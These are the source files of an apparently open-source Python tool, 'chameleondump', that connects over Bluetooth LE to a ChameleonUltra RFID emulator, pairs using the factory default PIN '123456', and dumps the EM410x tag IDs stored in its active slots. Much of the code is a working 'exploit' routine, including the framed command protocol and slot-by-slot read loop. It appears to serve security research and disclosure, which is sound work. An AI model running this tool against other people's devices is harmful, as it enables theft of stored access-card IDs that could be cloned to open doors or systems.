import os
import asyncio
import argparse
from bleak import BleakClient
from .devices import SUPPORTED_DEVICES
from .utils.print_with_color import print_with_color
from .utils.ble_utils import find_device, is_macos_bluetooth_pairing_dialog_active, pair_macos_bluetooth_device

ASCII_ART = "____            ________                         __                 ____                      \n" \
"/X    ~-.       / ____/ /_  ____ _____ ___  ___  / /__  ____  ____  / __ \\__  ______ ___  ____ \n" \
"\\/ __ .- |     / /   / __ \\/ __ `/ __ `__ \\/ _ \\/ / _ \\/ __ \\/ __ \\/ / / / / / / __ `__ \\/ __ \\\n" \
" // //  @     / /___/ / / / /_/ / / / / / /  __/ /  __/ /_/ / / / / /_/ / /_/ / / / / / / /_/ /\n" \
"              \\____/_/ /_/\\__,_/_/ /_/ /_/\\___/_/\\___/\\____/_/ /_/_____/\\__,_/_/ /_/ /_/ .___/ \n" \
"                                                                                       /_/      "

async def main(loop):
    if os.name != "posix":
        print_with_color("This tool is only supported on macOS.", "red", "[-]")
        return

    parser = argparse.ArgumentParser(description='ChameleonDump')
    parser.add_argument('--device', help='The target device', choices=SUPPORTED_DEVICES.keys(), default="ChameleonUltra")
    parser.add_argument('--pin', help='The PIN to use for pairing, leave empty to use the default PIN')
    parser.add_argument('--mask', help='Mask the RFID tag IDs', type=bool, default=False)
    args = parser.parse_args()

    print_with_color(ASCII_ART, "yellow")
    print_with_color(f"Searching for {args.device}...", "yellow", "[+]")

    device_address = None
    
    while device_address is None:
        device_address = await find_device(args.device)
        if device_address is None:
            await asyncio.sleep(1)

    client = BleakClient(device_address, loop=loop)
    await client.connect()

    if not client.is_connected:
        print_with_color("Failed to connect to the device.", "red", "[!]")
        return

    print_with_color(f"Connected!", "green", "[+]")

    device_class = SUPPORTED_DEVICES[args.device]

    if await is_macos_bluetooth_pairing_dialog_active(loop):
        print_with_color("Pairing dialog is active, trying to pair...", "orange", "[+]")
        pin = args.pin if args.pin else device_class.DEFAULT_PIN
        pair_macos_bluetooth_device(args.device, pin)

    if not client.is_connected:
        print_with_color("Invalid PIN or pairing failed.", "red", "[!]")
        return
    
    device_instance = device_class(client, mask=args.mask)
    
    await device_instance.exploit()
    await client.disconnect()

def cmd():
    try:
        loop = asyncio.get_event_loop()
        loop.run_until_complete(main(loop))
        loop.close()
    except KeyboardInterrupt:
        # remove the ^C from the terminal
        print("\b\b", end="")
        print_with_color("Interrupted by user.", "red", "[-]")

if __name__ == "__main__":
    cmd()


import struct
import asyncio
from enum import Enum
from utils.print_with_color import print_with_color

class ChameleonUltraCommand(Enum):
    SET_SLOT = 1003
    GET_ENABLED_SLOTS = 1023
    GET_EM410X_EMU_ID = 5001

class ChameleonUltraResponseStatus(Enum):
    LF_TAG_OK = 64
    LF_TAG_NOT_FOUND = 65
    PAR_ERR = 96
    DEVICE_MODE_ERROR = 102
    INVALID_CMD = 103
    DEVICE_SUCCESS = 104
    NOT_IMPLEMENTED = 105

class ChameleonUltra:

    DEFAULT_PIN = "123456"
    SERV_CHARACTERISTIC_UUID = "6e400001-b5a3-f393-e0a9-e50e24dcca9e"
    SEND_CHARACTERISTIC_UUID = "6e400002-b5a3-f393-e0a9-e50e24dcca9e"
    RECV_CHARACTERISTIC_UUID = "6e400003-b5a3-f393-e0a9-e50e24dcca9e"

    def __init__(self, client, mask=False):
        self.mask = mask
        self.client = client
        self.response_received = asyncio.Event()

    async def exploit(self):
        print_with_color("Dumping EM410x tags from Chameleon Ultra...", "green", "")
        print("")
        
        await self.client.start_notify(self.RECV_CHARACTERISTIC_UUID, self.handle_enabled_slots)
        await self.send_command(ChameleonUltraCommand.GET_ENABLED_SLOTS)
        await self.response_received.wait()

    async def handle_enabled_slots(self, _: int, data: bytearray):
        frame = ChameleonUltraFrame(data, mask=self.mask)
        if frame.status != ChameleonUltraResponseStatus.DEVICE_SUCCESS:
            print(f"[-] Failed to get enabled slots: {frame.status}")
            self.response_received.set()
            return

        active_slots = []
        for i in range(8):
            if frame.data[i] == 1:
                active_slots.append(i)
        
        if len(active_slots) == 0:
            print(f"[-] No active slots found")
            self.response_received.set()
            return

        await self.client.stop_notify(self.RECV_CHARACTERISTIC_UUID)
        print_with_color(f"Active slots: {active_slots}", "green", "[+]")

        def notification_handler(_: int, data: bytearray):
            frame = ChameleonUltraFrame(data, mask=self.mask)
            print_with_color(f"Received frame: {frame}", "green", "[+]")
        
        await self.client.start_notify(self.RECV_CHARACTERISTIC_UUID, notification_handler)
        await asyncio.sleep(0.1)

        for slot in active_slots:
            await self.send_command(ChameleonUltraCommand.SET_SLOT, bytearray([slot]))
            await self.send_command(ChameleonUltraCommand.GET_EM410X_EMU_ID)
            await asyncio.sleep(0.1)
        
        await asyncio.sleep(1)
        self.response_received.set()

    async def send_command(self, cmd: ChameleonUltraCommand, data = bytearray(), status = 0):
        data_str = data.hex() or "<empty>"
        print_with_color(f"Sending command {cmd} with data {data_str}...", "blue", "> ")
        try:
            # Replace these variables with your actual values
            command_code = cmd.value  # Replace with your actual command code
            data_buffer = data  # Replace with your actual data

            # Create command array (10 for header + length of data)
            command_array = bytearray(10 + len(data_buffer))
            command_array[0] = 0x11  # SOF1
            command_array[1] = 0xEF  # SOF2

            # Add Command
            command_array[2] = (command_code >> 8) & 0xFF  # High byte
            command_array[3] = command_code & 0xFF  # Low byte

            # Add Status (probably 0 if you are sending a command)
            command_array[4] = (status >> 8) & 0xFF  # High byte
            command_array[5] = status & 0xFF  # Low byte

            # Add Data Length
            data_length = len(data_buffer)
            command_array[6] = (data_length >> 8) & 0xFF  # High byte
            command_array[7] = data_length & 0xFF  # Low byte

            # Calculate and Add Head LRC
            head_bytes = bytearray(command_array[2:8])
            head_lrc = self.calc_lrc(head_bytes)  # Assume calc_lrc is defined
            command_array[8] = head_lrc

            # Add Data
            command_array[9:9+len(data_buffer)] = data_buffer

            # Calculate and Add Data LRC
            data_lrc = self.calc_lrc(bytearray(data_buffer))
            command_array[9 + len(data_buffer)] = data_lrc

            # Send the command
            await self.client.write_gatt_char(self.SEND_CHARACTERISTIC_UUID, command_array, True)
        except Exception as error:
            print_with_color(f"Failed to send command {cmd}: {error}", "red", "[-]")
            raise error
        
    def calc_lrc(self, buf):
        sum_ = 0
        for i in buf:
            sum_ += i
        return (0x100 - sum_) & 0xFF

class ChameleonUltraFrame:
    def __init__(self, data_view, mask = False):
        self.mask = mask
        self.data_view = data_view

    @property
    def cmd(self):
        return struct.unpack(">H", self.data_view[2:4])[0]  # ">H" for big-endian 2-byte unsigned int

    @property
    def status(self):
        status = struct.unpack(">H", self.data_view[4:6])[0]  # ">H" for big-endian 2-byte unsigned int
        return ChameleonUltraResponseStatus(status)
    
    @property
    def data(self):
        return self.data_view[9:-1]  # Excluding last byte
    
    def __str__(self):
        data_str = self.data.hex() or "<empty>"
        if data_str != "<empty>":
            if self.mask:
                data_str = data_str[:-6] + "******"

        return f"cmd: {self.cmd}, status: {self.status}, data: {data_str}"


from setuptools import setup, find_packages

setup(
    name='chameleondump',
    version='0.1.2',
    description="Dump RFID tag IDs from ChameleonUltra devices",
    packages=find_packages(),
    author='Ron Masas',
    url='https://github.com/masasron/chameleondump',
    install_requires=[
        'bleak==0.21.0',
        'termcolor==2.3.0',
    ],
    entry_points={
        'console_scripts': [
            'chameleondump = chameleondump.main:cmd',
        ],
    },
    license='GNU GPLv3',
    keywords = ['RFID', 'NFC', 'ChameleonUltra', 'ChameleonMini', 'BLE', 'Bluetooth'],
)


from abc import ABC, abstractmethod

class BaseDevice(ABC):

    DEFAULT_PIN = None  # Default PIN, should be overridden in child class

    @abstractmethod
    async def exploit(self, client):
        """Exploit method that each device must implement."""
        pass
